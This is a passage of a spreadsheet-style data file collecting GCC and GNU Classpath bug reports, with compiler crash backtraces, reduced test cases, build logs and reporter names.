Release:
3.0.3
Environment:
Debian package gcj-3.0
Configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux
Thread model: posix
gcc version 3.0.3
How-To-Repeat:
gcj A.class</t>
  </si>
  <si>
    <t>daniel.bonniot</t>
  </si>
  <si>
    <t>GCC-47968</t>
  </si>
  <si>
    <t>ICE: in gen_lowpart_general at rtlhooks.c:51 when converting vector of double to vector of float</t>
  </si>
  <si>
    <t>Created attachment 23527
reduced testcase
Compiler output:
$ gcc -O testcase.c
testcase.c: In function 'foo':
testcase.c:7:3: internal compiler error: in gen_lowpart_general at rtlhooks.c:51
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) bt
#0  fancy_abort (file=0x115e428 /mnt/svn/gcc-trunk/gcc/rtlhooks.c line=51 function=0x115e490 gen_lowpart_general)
    at /mnt/svn/gcc-trunk/gcc/diagnostic.c:892
#1  0x0000000000874ccb in gen_lowpart_general (mode=SFmode x=) at /mnt/svn/gcc-trunk/gcc/rtlhooks.c:51
#2  0x000000000069bb04 in extract_bit_field (str_rtx= bitsize= bitnum= 
    unsignedp= packedp= target= mode=SFmode tmode=SFmode)
    at /mnt/svn/gcc-trunk/gcc/expmed.c:1684
#3  0x00000000006a9562 in expand_expr_real_1 (exp=0x7ffff5ba5280 target= tmode=SFmode modifier=EXPAND_NORMAL alt_rtl=0x0)
    at /mnt/svn/gcc-trunk/gcc/expr.c:9211
#4  0x00000000006af03d in expand_expr_real (exp=0x7ffff5ba5280 target= tmode= 
    modifier= alt_rtl=) at /mnt/svn/gcc-trunk/gcc/expr.c:7206
#5  expand_expr_real (exp=0x7ffff5ba5280 target= tmode= modifier= 
    alt_rtl=) at /mnt/svn/gcc-trunk/gcc/expr.c:7174
#6  0x00000000006ab820 in expand_expr (exp=0x7ffff5ba41b8 target=0x7ffff5b948e0 tmode=SFmode modifier=EXPAND_NORMAL alt_rtl=0x0)
    at /mnt/svn/gcc-trunk/gcc/expr.h:422
#7  expand_expr_real_1 (exp=0x7ffff5ba41b8 target=0x7ffff5b948e0 tmode=SFmode modifier=EXPAND_NORMAL alt_rtl=0x0)
    at /mnt/svn/gcc-trunk/gcc/expr.c:8807
#8  0x00000000008d065b in expand_expr (retval=0x7ffff7ff91f8) at /mnt/svn/gcc-trunk/gcc/expr.h:422
#9  expand_return (retval=0x7ffff7ff91f8) at /mnt/svn/gcc-trunk/gcc/stmt.c:1812
#10 0x00000000005e0e8b in expand_gimple_stmt_1 (stmt=0x7ffff5b89510) at /mnt/svn/gcc-trunk/gcc/cfgexpand.c:1951
#11 expand_gimple_stmt (stmt=0x7ffff5b89510) at /mnt/svn/gcc-trunk/gcc/cfgexpand.c:2080
#12 0x00000000005e2f29 in expand_gimple_basic_block (bb=0x7ffff5b851a0) at /mnt/svn/gcc-trunk/gcc/cfgexpand.c:3609
#13 0x00000000005e81d9 in gimple_expand_cfg () at /mnt/svn/gcc-trunk/gcc/cfgexpand.c:4092
#14 0x00000000007f7056 in execute_one_pass (pass=0x1638ac0) at /mnt/svn/gcc-trunk/gcc/passes.c:1556
#15 0x00000000007f7355 in execute_pass_list (pass=0x1638ac0) at /mnt/svn/gcc-trunk/gcc/passes.c:1611
#16 0x000000000093a2b6 in tree_rest_of_compilation (fndecl=0x7ffff5b86f00) at /mnt/svn/gcc-trunk/gcc/tree-optimize.c:422
#17 0x0000000000b02312 in cgraph_expand_function (node=0x7ffff5ba6000) at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1576
#18 0x0000000000b04a5a in cgraph_expand_all_functions () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1635
#19 cgraph_optimize () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1899
#20 0x0000000000b04fda in cgraph_finalize_compilation_unit () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1096
#21 0x00000000005097bc in c_write_global_declarations () at /mnt/svn/gcc-trunk/gcc/c-decl.c:9872
#22 0x00000000008e3248 in compile_file (argc=13 argv=0x7fffffffdbd8) at /mnt/svn/gcc-trunk/gcc/toplev.c:591
#23 do_compile (argc=13 argv=0x7fffffffdbd8) at /mnt/svn/gcc-trunk/gcc/toplev.c:1900
#24 toplev_main (argc=13 argv=0x7fffffffdbd8) at /mnt/svn/gcc-trunk/gcc/toplev.c:1963
#25 0x00007ffff6446bbd in __libc_start_main () from /lib/libc.so.6
#26 0x00000000004f036d in _start ()
Tested revisions:
r170622 - crash
4.5 r170013 - crash
4.4 r170013 - crash
4.4.5 (release checking) - crash
4.3.5 (release checking) - OK
Maybe it's a regression from 4.3.</t>
  </si>
  <si>
    <t>GCC-40039</t>
  </si>
  <si>
    <t>Procedures as actual arguments: Check intent of arguments</t>
  </si>
  <si>
    <t>Consider the following module:
module m
contains
subroutine a(xf)
  real :: x
  interface
    real function f(y)
      realintent(in) :: y
    end function
  end interface
  print *f(x)
end subroutine
real function func(z)
  realintent(inout) :: z
  func = z**2
end function
subroutine caller
  call a(4.3func)
end subroutine
end module 
ifort complains:
error #7061: The characteristics of dummy argument 1 of the associated actual procedure differ from the characteristics of dummy argument 1 of the dummy procedure. (12.2)   [FUNC]
  call a(4.3func)
Although gfortran g95 and sunf95 accept it I think ifort is right to reject it (but I haven't checked the standard yet). The same check should also be applied to procedure pointer assignments.
Btw gfortran -Wall -Wextra produces this warning:
test.f90:5: warning: unused parameter â€˜fâ€™
This is bogus because 'f' *is* used in the subroutine a.</t>
  </si>
  <si>
    <t>GCC-49099</t>
  </si>
  <si>
    <t>sparc.c:â€˜sparc_solaris_elf_asm_named_sectionâ€™ declared â€˜staticâ€™ but never defined</t>
  </si>
  <si>
    <t>gcc -c   -g -O2 -DIN_GCC -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../../gcc/gcc -I../../../gcc/gcc/. -I../../../gcc/gcc/../include -I../../../gcc/gcc/../libcpp/include -I/opt/cfarm/mpc/include  -I../../../gcc/gcc/../libdecnumber -I../../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber    \
                ../../../gcc/gcc/config/sparc/sparc.c -o sparc.o
../../../gcc/gcc/config/sparc/sparc.c:395:13: error: â€˜sparc_solaris_elf_asm_named_sectionâ€™ declared â€˜staticâ€™ but never defined [-Werror=unused-function]
cc1: all warnings being treated as errors
make[2]: *** [sparc.o] Error 1</t>
  </si>
  <si>
    <t>GCC-40010</t>
  </si>
  <si>
    <t>Parallel make issue when building man pages</t>
  </si>
  <si>
    <t>The gcc manpage is not always created due to a dependency missing for gcc.pod in gcc/Makefile.in.  invoke.texi depends upon gcc-vers.texi being generated but no such dependency is listed.  This was found by 6vvetjsrt26xsrzlh1z0zn4d2grdah@gmail.com in https://bugs.gentoo.org/show_bug.cgi?id=256608
I'm attaching a patch by him which fixes this issue.</t>
  </si>
  <si>
    <t>halcy0n</t>
  </si>
  <si>
    <t>GCC-45427</t>
  </si>
  <si>
    <t>Number of iteration analysis bogus</t>
  </si>
  <si>
    <t>The analysis for nb_iterations_upper_bound is bogus when we derive bounds for
an exit check ptr == 0 (leading to an assert).  The testcase looks like
(subroutine cxb3014__test_block__char_pointers__value from acats CXB3014):
:
  # p_1 = PHI 
  # h_2 = PHI 
  D.3266_7 = *p_1
  if (D.3266_7 == terminator_9(D))
    goto 
  else
    goto 
:
  h_10 = h_2 + 1
  if (p_1 == 0B)
    goto 
  else
    goto 
:
  D.3760.P_ARRAY = i-cpoint.adb:59 instantiated at cxb3014.adb:114
  D.3760.P_BOUNDS = 
  ada.exceptions.raise_exception_always (
:
  left.84_50 = (cxb3014__test_block__char_pointers__addr) p_13
  D.3762_51 = left.84_50 + 1
  p_52 = (cxb3014__test_block__char_pointers__element * {ref-all}) D.3762_51
  # DEBUG ref =&gt; p_52
  # DEBUG p =&gt; p_52
  goto 
:
  ...
when looking at the exit 6-&gt;7 number_of_iterations_ne is present with
iv-&gt;base (cxb3014__test_block__char_pointers__element * {ref-all}) ref_4(D)
and final 0B the step is 1.  We then do
  else
    {
      s = fold_convert (niter_type iv-&gt;step)
      c = fold_build2 (MINUS_EXPR niter_type
                       fold_convert (niter_type final)
                       fold_convert (niter_type iv-&gt;base))
    }
which creates -(UNSIGNED_64) ref_4(D) for c with no_overflow set as we
do for pointers (but note we now have unsigned_type_for a non-pointer!)
we obviously can't reach zero with a step of 1 without overflowing
without the initial value being zero.
I have a patch in the works that uses number of iteration analysis for
value-range propagation and that miscompiles CXB3014 because of the
above bug.
Zdenek - any idea?</t>
  </si>
  <si>
    <t>GCC-30771</t>
  </si>
  <si>
    <t>[4.3 Regression] ice for legal code with -O2 -ftree-vectorize</t>
  </si>
  <si>
    <t>I just tried to compile Suse Linux package ladspa-1.12.code10-56
with the GNU C++ compiler version 4.3 snapshot 20070209.
The compiler said
Descriptor.h: In static member function 'static void* Descriptor::_instantiate(const _LADSPA_Descriptor* ulong) [with T = CabinetII]':
Descriptor.h:117: internal compiler error: in vectorizable_type_promotion at tree-vect-transform.c:2601
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source code attached. Flags -ftree-vectorize -O2 required.</t>
  </si>
  <si>
    <t>GCC-80426</t>
  </si>
  <si>
    <t>[6 Regression] wrong manipulation of range based on INT_MIN</t>
  </si>
  <si>
    <t>GCC 7.0.1 for x86_64 miscompiles the following code.
% cat test.c
#define INT_MAX 0x7fffffff
#define INT_MIN (-INT_MAX-1)
int x
int main (void)
{
  volatile int a = 0
  volatile int b = -INT_MAX
  int j
  for( j = 0 j &lt; 18 j += 1 ) {
    x = ( (a == 0) != (b - (int)(INT_MIN) ) )
  }
  if (x != 0) __builtin_abort()
  return 0
}
% gcc-7.0 test.c -O2
% ./a.out
zsh: abort (core dumped)  ./a.out
% gcc-7.0 test.c -O3
% ./a.out
zsh: abort (core dumped)  ./a.out
% gcc-7.0 test.c -Os
% ./a.out
zsh: abort (core dumped)  ./a.out
% gcc-7.0 -v
Using built-in specs.
COLLECT_GCC=gcc-7.0
COLLECT_LTO_WRAPPER=/home/cappie/opt/gcc-7.0.1/libexec/gcc/x86_64-pc-linux-gnu/7.0.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../configure --prefix=/home/cappie/opt/gcc-7.0.1 --disable-nls --disable-multilib --program-suffix=-7.0 --enable-languages=c
Thread model: posix
gcc version 7.0.1 20170330 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-58380</t>
  </si>
  <si>
    <t>[4.9 Regression] ice in fold_comparison</t>
  </si>
  <si>
    <t>Created attachment 30785
gzipped C++ source code
I just tried to compile package k3d-0.8.0.2-19 with gcc 4.9 trunk
dated 20130909. It said
/home/dcb/rpmbuild/BUILD/k3d-source-0.8.0.2/k3dsdk/document_plugin_factory.h:48:9: internal compiler error: Segmentation fault
  inode* create_plugin(iplugin_factory&amp; Factory idocument&amp; Document)
         ^
0xacdd4f crash_signal
    ../../src/trunk/gcc/toplev.c:335
0x8b7709 fold_comparison
    ../../src/trunk/gcc/fold-const.c:9052
0x8c0b9b fold_binary_loc(unsigned int tree_code tree_node* tree_node* tree_node*)
    ../../src/trunk/gcc/fold-const.c:12780
0xaff5d2 cleanup_control_expr_graph
    ../../src/trunk/gcc/tree-cfgcleanup.c:96
0xaff5d2 cleanup_control_flow_bb
    ../../src/trunk/gcc/tree-cfgcleanup.c:171
0xaff5d2 cleanup_tree_cfg_bb
    ../../src/trunk/gcc/tree-cfgcleanup.c:589
0xb01018 cleanup_tree_cfg_1
    ../../src/trunk/gcc/tree-cfgcleanup.c:634
0xb01018 cleanup_tree_cfg_noloop
    ../../src/trunk/gcc/tree-cfgcleanup.c:690
0xb01018 cleanup_tree_cfg()
    ../../src/trunk/gcc/tree-cfgcleanup.c:745
0xa27a84 execute_function_todo
    ../../src/trunk/gcc/passes.c:1791
0xa28167 execute_todo
    ../../src/trunk/gcc/passes.c:1866
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Here is valgrind helping out with a stack backtrace
==23967== Invalid read of size 2
==23967==    at 0x8B7709: fold_comparison(unsigned int tree_code tree_node* tree_node* tree_node*) (fold-const.c:9052)
==23967==    by 0x8C0B9B: fold_binary_loc(unsigned int tree_code tree_node* tree_node* tree_node*) (fold-const.c:12780)
==23967==    by 0xAFF5D2: cleanup_tree_cfg_bb(basic_block_def*) (tree-cfgcleanup.c:96)
==23967==    by 0xB01018: cleanup_tree_cfg() (tree-cfgcleanup.c:634)
Preprocessed source code attached. Flag -O2 required.</t>
  </si>
  <si>
    <t>GCC-33395</t>
  </si>
  <si>
    <t>[ISO_C_BINDING ?] ICE (segfault) in gfc_conv_initializer</t>
  </si>
  <si>
    <t>Fetch FGSL (0.7) from
http://www.lrz-muenchen.de/services/software/mathematik/gsl/fortran/
Run ./configure --f90 gfortran &amp;&amp; make
This should compile the library successfully.
Run now the following test case result:
test.f90:39: internal compiler error: Segmentation fault
==2416== Invalid read of size 8
==2416==    at 0x49F45A: gfc_conv_initializer (trans-expr.c:2832)
==2416==    by 0x49F271: gfc_conv_structure (trans-expr.c:3194)
==2416==    by 0x49F4DE: gfc_conv_initializer (trans-expr.c:2854)
module tmod
  use fgsl
  implicit none
contains
  subroutine expb_df() bind(c)
    type(fgsl_vector) :: f_x
    real(fgsl_double) pointer :: p_x(:)
    integer :: status
    status = fgsl_vector_align(p_x f_x)
  end subroutine expb_df
end module tmod</t>
  </si>
  <si>
    <t>GCC-78118</t>
  </si>
  <si>
    <t>xtensa: ICE in gcc-6.1.0/libgcc/libgcc2.c:1992:1: error: unrecognizable insn</t>
  </si>
  <si>
    <t>Created attachment 39900
preprocessed source that triggers ICE
/home/jcmvbkbc/ws/tensilica/crosstool/crosstool-NG/.build/xtensa-dc233c_call0-linux-uclibc/build/build-cc-gcc-core-pass-2/./gcc/xgcc -B/home/jcmvbkbc/ws/tensilica/crosstool/crosstool-NG/.build/xtensa-dc233c_call0-l
inux-uclibc/build/build-cc-gcc-core-pass-2/./gcc/ -B/home/jcmvbkbc/ws/tensilica/crosstool/crosstool-NG/.build/xtensa-dc233c_call0-linux-uclibc/buildtools/xtensa-dc233c_call0-linux-uclibc/bin/ -B/home/jcmvbkbc/ws/tensilica/cro
sstool/crosstool-NG/.build/xtensa-dc233c_call0-linux-uclibc/buildtools/xtensa-dc233c_call0-linux-uclibc/lib/ -isystem /home/jcmvbkbc/ws/tensilica/crosstool/crosstool-NG/.build/xtensa-dc233c_call0-linux-uclibc/buildtools/xtens
a-dc233c_call0-linux-uclibc/include -isystem /home/jcmvbkbc/ws/tensilica/crosstool/crosstool-NG/.build/xtensa-dc233c_call0-linux-uclibc/buildtools/xtensa-dc233c_call0-linux-uclibc/sys-include    -mlongcalls -mauto-litpools -g
 -Os -O2  -DIN_GCC  -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -fPIC -g -DIN_LIBGCC2 -fbuilding-libgc
c -fno-stack-protector   -fPIC -I. -I. -I../.././gcc -I/home/jcmvbkbc/ws/tensilica/crosstool/crosstool-NG/.build/src/gcc-6.1.0/libgcc -I/home/jcmvbkbc/ws/tensilica/crosstool/crosstool-NG/.build/src/gcc-6.1.0/libgcc/. -I/home/
jcmvbkbc/ws/tensilica/crosstool/crosstool-NG/.build/src/gcc-6.1.0/libgcc/../gcc -I/home/jcmvbkbc/ws/tensilica/crosstool/crosstool-NG/.build/src/gcc-6.1.0/libgcc/../include  -DHAVE_CC_TLS  -o _mulsc3.o -MT _mulsc3.o -MD -MP -M
F _mulsc3.dep -DL_mulsc3 -c /home/jcmvbkbc/ws/tensilica/crosstool/crosstool-NG/.build/src/gcc-6.1.0/libgcc/libgcc2.c -fvisibility=hidden -DHIDE_EXPORTS
[ALL  ]    /home/jcmvbkbc/ws/tensilica/crosstool/crosstool-NG/.build/src/gcc-6.1.0/libgcc/libgcc2.c: In function '__mulsc3':
[ERROR]    /home/jcmvbkbc/ws/tensilica/crosstool/crosstool-NG/.build/src/gcc-6.1.0/libgcc/libgcc2.c:1992:1: error: unrecognizable insn:
[ALL  ]     }
[ALL  ]     ^
[ALL  ]    (jump_insn 1361 1360 1362 55 (parallel [
[ALL  ]                (return)
[ALL  ]                (use (reg:SI 0 a0))
[ALL  ]            ]) /home/jcmvbkbc/ws/tensilica/crosstool/crosstool-NG/.build/src/gcc-6.1.0/libgcc/libgcc2.c:1992 -1
[ALL  ]         (expr_list:REG_DEAD (reg:SI 0 a0)
[ALL  ]            (nil))
[ALL  ]     -&gt; return)
[ERROR]    /home/jcmvbkbc/ws/tensilica/crosstool/crosstool-NG/.build/src/gcc-6.1.0/libgcc/libgcc2.c:1992:1: internal compiler error: in extract_insn at recog.c:2287
The configuration is for call0 ABI.</t>
  </si>
  <si>
    <t>jcmvbkbc</t>
  </si>
  <si>
    <t>GCC-52521</t>
  </si>
  <si>
    <t>[C++11] user defined literals and order of declaration</t>
  </si>
  <si>
    <t>#include 
int operator  _w(const char*)
int operator  _w(const char* std::size_t)
int main() {
  123_w
}
a.cc: In function 'int main()':
a.cc:5:3: error: unable to find numeric literal operator 'operator _w'
The problem disappears if I switch the 2 declarations...
Btw mangling these operators like functions called li_w taking the same arguments is strange I could have such a function in my code.</t>
  </si>
  <si>
    <t>GCC-3597</t>
  </si>
  <si>
    <t>Running Configure fails for mysql 3.23.39 application</t>
  </si>
  <si>
    <t>contains any messages produced by compilers while
running configure to aid debugging if configure makes a mistake.
configure:812: checking host system type
configure:833: checking target system type
configure:851: checking build system type
configure:886: checking for a BSD compatible install
configure:939: checking whether build environment is sane
configure:974: checking whether make sets ${MAKE}
configure:1020: checking for working aclocal
configure:1033: checking for working autoconf
configure:1046: checking for working automake
configure:1059: checking for working autoheader
configure:1072: checking for working makeinfo
configure:1174: checking whether to enable maintainer-specific portions of Makefiles
configure:1216: checking whether build environment is sane
configure:1233: checking whether make sets ${MAKE}
configure:1301: checking for gawk
configure:1333: checking for gcc
configure:1446: checking whether the C compiler (gcc   ) works
configure:1462: gcc -o conftest     conftest.c  1&gt;&amp;5
configure:1488: checking whether the C compiler (gcc   ) is a cross-compiler
configure:1493: checking whether we are using GNU C
configure:1502: gcc -E conftest.c
configure:1521: checking whether gcc accepts -g
configure:1557: checking for c++
configure:1589: checking whether the C++ compiler (c++   ) works
configure:1605: c++ -o conftest     conftest.C  1&gt;&amp;5
configure: In function `int main()':
configure:1602: Internal compiler error.
configure:1602: Please submit a full bug report.
configure:1602: See  for instructions.
configure: failed program was:
#line 1600 configure
#include confdefs.h
int main(){return(0)}
Release:
unknown
Environment:
Solaris 2.8 ( Intel)
gcc 2.95.2
How-To-Repeat:
Simply download mysql 3.23.39 from http://www.mysql.com and then
run configure this fails.</t>
  </si>
  <si>
    <t>pbbruce</t>
  </si>
  <si>
    <t>CLASSPATH-30718</t>
  </si>
  <si>
    <t>TransformerException in XSLURIResolver</t>
  </si>
  <si>
    <t>With the soon-to-be attached test case (javac [-1.5] *.java java Main) I get no stack trace with Sun's VM when I do with classpath head (built from CVS using Eclipse) and cacao.  This prevents Mylar (an Eclipse plugin) from working correctly.
This is the stack trace:
(Note that the line numbers may be slightly off as I was adding debug statements)
javax.xml.transform.TransformerException: can't resolve URL: null
   at gnu.xml.transform.XSLURIResolver.resolveDOM(XSLURIResolver.java:187)
   at gnu.xml.transform.TransformerImpl.transform(TransformerImpl.java:123)
   at SaxRepositoriesWriter.writeRepositoriesToStream(SaxRepositoriesWriter.java:49)
   at TaskRepositoriesExternalizer.writeRepositoriesToXML(TaskRepositoriesExternalizer.java:27)
   at Main.main(Main.java:19)
java.io.IOException: can't resolve URL: null
   at SaxRepositoriesWriter.writeRepositoriesToStream(SaxRepositoriesWriter.java:54)
   at TaskRepositoriesExternalizer.writeRepositoriesToXML(TaskRepositoriesExternalizer.java:27)
   at Main.main(Main.java:19)</t>
  </si>
  <si>
    <t>GCC-31876</t>
  </si>
  <si>
    <t>SH: ICE in gen_lowpart_general at rtlhooks.c:59</t>
  </si>
  <si>
    <t>Attached code fails to compile with cross compiler for sh4-linux.
$ sh-linux-gcc -m4 -c frame.i
frame.c: In function ï¿½efaacEncSetConfigurationï¿½f:
frame.c:262: internal compiler error: in gen_lowpart_general at rtlhooks.c:59</t>
  </si>
  <si>
    <t>GCC-6073</t>
  </si>
  <si>
    <t>[Solaris] Internal compiler error in simplify_gen_subreg at simplify-rtx.c:2711</t>
  </si>
  <si>
    <t>When compiling the attached file I get:
# gcc ice.ii
ice.ii: In member function `void b::f()':
ice.ii:12: Internal compiler error in simplify_gen_subreg at simplify-rtx.c:
   2711
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc version 3.1 20020327 (prerelease)
Environment:
System: SunOS avatar 5.8 Generic_108528-12 sun4u sparc SUNWUltra-5_10
Architecture: sun4
host: sparcv9-sun-solaris2.8
build: sparcv9-sun-solaris2.8
target: sparcv9-sun-solaris2.8
configured with: ../../gcc/configure --enable-threads=posix --enable-long-long --prefix=/opt/Pkg/SunOS/gcc31_64 --enable-languages=cc++f77objcjava --disable-nls --enable-shared sparcv9-sun-solaris2.8
How-To-Repeat:
Just compile the attached file. -)</t>
  </si>
  <si>
    <t>GCC-60467</t>
  </si>
  <si>
    <t>ICE with -fcilkplus</t>
  </si>
  <si>
    <t>The following code ICEs with  -fcilkplus:
void f(void) { }
int main() {
  _Cilk_spawn(f)
  return 0
}
foo.c: In function 'main':
foo.c:4:1: internal compiler error: in tree_block at tree.c:11241
 _Cilk_spawn(f)
 ^
0xbeb577 tree_block(tree_node*)
        ../../gcc/tree.c:11241
0x61fbde create_cilk_wrapper
        ../../gcc/c-family/cilk.c:718
0x61fbde gimplify_cilk_spawn(tree_node**)
        ../../gcc/c-family/cilk.c:756</t>
  </si>
  <si>
    <t>GCC-83844</t>
  </si>
  <si>
    <t>[8 Regression] ICE with warn_if_not_aligned attribute</t>
  </si>
  <si>
    <t>typedef unsigned long long __u64 __attribute__((aligned(4)warn_if_not_aligned(8)))
void
bar (int n)
{
  struct A
  {
    int i1
    int i2
    int i3[n]
    __u64 x
  } __attribute__((aligned (8)))
  struct B
  {
    int i1
    int i2
    long long i3[n]
    __u64 x
  } __attribute__((aligned (8)))
  struct A a
  struct B b
}
ICEs starting with r251180.  Obviously not in all structs we can use tree_to_uhwi on DECL_FIELD_OFFSET without checking if it actually tree_fits_uhwi_p.</t>
  </si>
  <si>
    <t>GCC-11917</t>
  </si>
  <si>
    <t>Iternal compiler error template/sizeof-related</t>
  </si>
  <si>
    <t>static int x()
template
class C
{
protected:
    static int const xSize = sizeof( x() )
public:
    enum{ value = sizeof( xSize ) }
}
struct A{}
int main()
{
    int const whatever = C::value
}
================================================================
when compiled with
  g++ a.cpp
yields
a.cpp: In instantiation of `const int C::xSize':
a.cpp:19:   instantiated from `C'
a.cpp:19:   instantiated from here
a.cpp:8: Internal compiler error in instantiate_decl at cp/pt.c:10052
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>alf_p_steinbach</t>
  </si>
  <si>
    <t>GCC-25466</t>
  </si>
  <si>
    <t>typeid expression fails to throw bad_typeid according to 5.2.8p2</t>
  </si>
  <si>
    <t>5.2.8p2 says that if a typeid expression refers to a polymorphic type and the expression is formed by dereferencing a null pointer that a bad_typeid should be thrown.
#include 
#include 
template 
bool is_polymorphic() {
   bool result(false)
   typeid( (result=true) *(T*)0)
   return result
}
struct non_polymorphic {}
struct polymorphic { virtual ~polymorphic() {} }
int main() {
   std::cout () &lt;&lt; '\n'
   std::cout () &lt;&lt; '\n'
   try
   {
      std::cout () &lt;&lt; '\n'              //3
      std::cout &lt;&lt; Fail should have thrown bad_typeid\n
   }
   catch (std::bad_typeid&amp;)
   {
      std::cout &lt;&lt; Pass\n
   }
   catch (...)
   {
      std::cout &lt;&lt; Fail bad_typeid not caught\n
   }
}
Expected output:
0
0
Pass
Output received with gcc 4.0.1
0
0
1
Fail should have thrown bad_typeid</t>
  </si>
  <si>
    <t>hhinnant</t>
  </si>
  <si>
    <t>CLASSPATH-25679</t>
  </si>
  <si>
    <t>gnu.regexp: {mn} processing is very slow</t>
  </si>
  <si>
    <t>Use the same test program as Bug #25616.
$ cat W.java
public class W {
  public static void main(String[] args) {
    System.out.println(args[0].matches(args[1]))
  }
}
And run
$ java W 'b' '(b*){9999}'
Sun's JDK immediately prints true. But GNU Classpath (with Kaffe) 
does not.
'(b*){50}' is OK '(b*){100}' is rather slow '(b*){300}' is
frustrating '(b*){1000}' makes me press Ctrl+C.</t>
  </si>
  <si>
    <t>GCC-33987</t>
  </si>
  <si>
    <t>[4.3 regression] internal compiler error: in get_initial_def_for_reduction at tree-vect-transform.c:2110 with -O3 -msse2</t>
  </si>
  <si>
    <t>$ gcc -O3 -msse2 -c concurrentMarkSweepGeneration.ii
/usr/src/ark/BUILD/icedtea/openjdk/hotspot/src/share/vm/gc_implementation/concurrentMarkSweep/concurrentMarkSweepGeneration.cpp:7235: internal compiler error: in get_initial_def_for_reduction at tree-vect-transform.c:2110
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-60482</t>
  </si>
  <si>
    <t>Loop optimization regression</t>
  </si>
  <si>
    <t>Created attachment 32323
trunk.s
Hi
I didn't had time to investigate further but I want to raise quickly that the code bellow was optimized at r204283 by taking into account the trip count information of the loop and is not with the trunk (I spotted the issue on AArch64 and x86_64).
code:
typedef double adouble __attribute__ ((__aligned__(16)))
double p1(adouble *x int n)
{
  double p1_ = 0.0
  (!(n % 128) == 0) ? __builtin_unreachable() : 1 
  for (int i=0 i&lt;n i++)
    p1_ += x[i] 
  return p1_ 
}
compiled with flags : -Ofast -std=c99
x86_64 generated assembly at r204283:
p1:
.LFB0:
        .cfi_startproc
        testl   %esi %esi
        jle     .L5
        pxor    %xmm1 %xmm1
        shrl    %esi
        xorl    %eax %eax
.L4:
        movq    %rax %rdx
        addq    $1 %rax
        salq    $4 %rdx
        cmpl    %eax %esi
        addpd   (%rdi%rdx) %xmm1
        ja      .L4
        movapd  %xmm1 %xmm0
        unpckhpd        %xmm1 %xmm1
        addsd   %xmm1 %xmm0
        ret
        .p2align 410
        .p2align 3
.L5:
        pxor    %xmm0 %xmm0
        ret
        .cfi_endproc
X86_64 trunk generated assembly is attached.
Thanks
Yvan</t>
  </si>
  <si>
    <t>yvan.roux</t>
  </si>
  <si>
    <t>GCC-61028</t>
  </si>
  <si>
    <t>[4.9/4.10 Regression] -g3 -g leads to spurious warnings</t>
  </si>
  <si>
    <t>With gcc 4.9 and 4.10 the following leads to unexpected warnings. It is triggered by the sequence '-g3 -g'
&gt; cat test.F
#if 1
 WRITE(6*) Hello world!
#endif
END
&gt; gfortran -g3 -g -c -ffree-form test.F
Warning: :1: Illegal preprocessor directive
Warning: :2: Illegal preprocessor directive
Warning: :3: Illegal preprocessor directive
Warning: :4: Illegal preprocessor directive
[...]</t>
  </si>
  <si>
    <t>GCC-56468</t>
  </si>
  <si>
    <t>Clang exposes bug with unexpected forward-declaration of type_info</t>
  </si>
  <si>
    <t>The following program fails to compile with Clang++ 3.2:
#include 
#include 
const char* get_name( const std::exception_ptr eptr )
{
  return eptr.__cxa_exception_type()-&gt;name()
}
int main() {}
The output in the shell is:
$ g++-4.7 -std=c++0x -O3 -Wall -Wextra t.cc -o t
$ clang++-3.2 -std=c++0x -O3 -Wall -Wextra t.cc -o t
t.cc:6:37: error: member access into incomplete type 'const class type_info'
  return eptr.__cxa_exception_type()-&gt;name()
                                    ^
/usr/bin/../lib/gcc/x86_64-linux-gnu/4.7/../../../../include/c++/4.7/bits/exception_ptr.h:144:19: note: forward declaration of
      'std::__exception_ptr::type_info'
      const class type_info*
                  ^
1 error generated.
$
The problem is that  includes  before it forward-declares std::type_info. In  type_info is used in the context of std::__exception_ptr thus Clang generates an implicit forward-declaration for std::__exception_ptr::type_info and when used in the above code consequently fails.
Further discussion has taken place at .</t>
  </si>
  <si>
    <t>d.frey</t>
  </si>
  <si>
    <t>GCC-22318</t>
  </si>
  <si>
    <t>debug info wrong for doubles followed by bools</t>
  </si>
  <si>
    <t>This is a problem in gcc's default debug format.  It works fine with -gstabs.     
struct X  
{  
	bool x  
	double d  
}  
int main()  
{  
	X x  
	x.d = 42.0  
}  
When debugging with gdb x.d will contain something wrong (often something   
like 5.301466631257326e-315). If you change the bool to another type or   
remove that variable completely the results are correct. If you move the bool  
to the end of the structure the results are also correct.  
This bug does not affect the execution of the program.  
I guess it's something to do with how gcc writes debug info for the size of a   
bool in the structure possibly related to packing.  
I'm also able to reproduce this on gcc 3.3.4.</t>
  </si>
  <si>
    <t>GCC-21766</t>
  </si>
  <si>
    <t>[4.1 Regression] Bootstrap failure on i686-pc-cygwin</t>
  </si>
  <si>
    <t>/cygdrive/c/sf/gcc-build/./gcc/xgcc -B/cygdrive/c/sf/gcc-build/./gcc/
-B/usr/local/i686-pc-cygwin/bin/ -B/usr/local/i686-pc-cygwin/lib/ -isystem
/usr/local/i686-pc-cygwin/include -isystem /usr/local/i686-pc-cygwin/sys-include
